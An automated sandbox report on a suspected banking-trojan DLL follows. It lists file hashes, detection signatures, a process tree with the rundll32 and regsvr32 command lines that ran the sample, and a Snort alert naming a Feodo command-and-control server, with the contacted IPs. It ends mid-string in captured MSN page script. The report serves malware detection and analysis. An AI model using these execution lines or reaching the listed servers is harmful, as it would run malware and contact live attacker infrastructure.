Play interactive tour

Edit tour

Windows Analysis Report DAQzQ6FyNs

Overview

General Information

Sample Name:	DAQzQ6FyNs (renamed file extension from none to dll)
Analysis ID:	495657
MD5:	c6312fbf8d344014804200a3101a6379
SHA1:	f5733b3950ab0a0b25c80a81b4b56af8083108e7
SHA256:	91c09eab3e0328874c32b21673a61d4e591267c537a9d1cafa8ae92350323073
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Writes to foreign memory regions

Sigma detected: Regsvr32 Command Line Without DLL

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for sample

Allocates memory in foreign processes

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Tries to load missing DLLs

Checks if the current process is being debugged

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 716 cmdline: loaddll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6040 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5684 cmdline: rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 7112 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

wermgr.exe (PID: 7132 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)

regsvr32.exe (PID: 5468 cmdline: regsvr32.exe /s C:\Users\user\Desktop\DAQzQ6FyNs.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

WerFault.exe (PID: 5832 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

iexplore.exe (PID: 5592 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 1332 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5592 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 340 cmdline: rundll32.exe C:\Users\user\Desktop\DAQzQ6FyNs.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 7124 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

wermgr.exe (PID: 7148 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)

cmd.exe (PID: 2260 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

wermgr.exe (PID: 5640 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)

rundll32.exe (PID: 4624 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\free_LogicMonitorUQG4AO\gsDAQzQ6FyNsks.our,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Command Line Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\DAQzQ6FyNs.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 5468, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668, ProcessId: 5832

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: DAQzQ6FyNs.dll	Virustotal: Detection: 11%			Perma Link
Source: DAQzQ6FyNs.dll	ReversingLabs: Detection: 15%

Machine Learning detection for sample

Show sources

Source: DAQzQ6FyNs.dll

Joe Sandbox ML: detected

Source: DAQzQ6FyNs.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.139:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.139:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 179.189.229.254:443 -> 192.168.2.5:49861 version: TLS 1.2

Source: DAQzQ6FyNs.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: fltLib.pdb/ source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.336942703.00000000052FE000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: regsvr32.pdbk source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb# source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.336714628.000000000346D000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdba source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb1 source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: regsvr32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb% source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.336842453.0000000003461000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb; source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdbY source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb= source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.336714628.000000000346D000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.343969686.00000000056A0000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.336566562.0000000003467000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000001A.00000003.344243767.00000000056A6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000001A.00000003.343733762.00000000056D1000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49860 -> 46.99.188.223:443

Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: 8916410db85077a5460817142dcbc8de

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	TCP traffic detected without corresponding DNS query: 46.99.188.223
Source: unknown	TCP traffic detected without corresponding DNS query: 46.99.188.223
Source: unknown	TCP traffic detected without corresponding DNS query: 46.99.188.223
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 60.51.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 60.51.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 60.51.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254
Source: unknown	TCP traffic detected without corresponding DNS query: 179.189.229.254

Source: de-ch[1].htm.8.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.6.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xead553a6,0x01d7b7f3</date><accdate>0xead553a6,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.6.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xead553a6,0x01d7b7f3</date><accdate>0xead553a6,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.6.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.6.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.6.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xeae3a204,0x01d7b7f3</date><accdate>0xeae3a204,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.6.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xeae3a204,0x01d7b7f3</date><accdate>0xeae3a204,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.8.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.8.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle 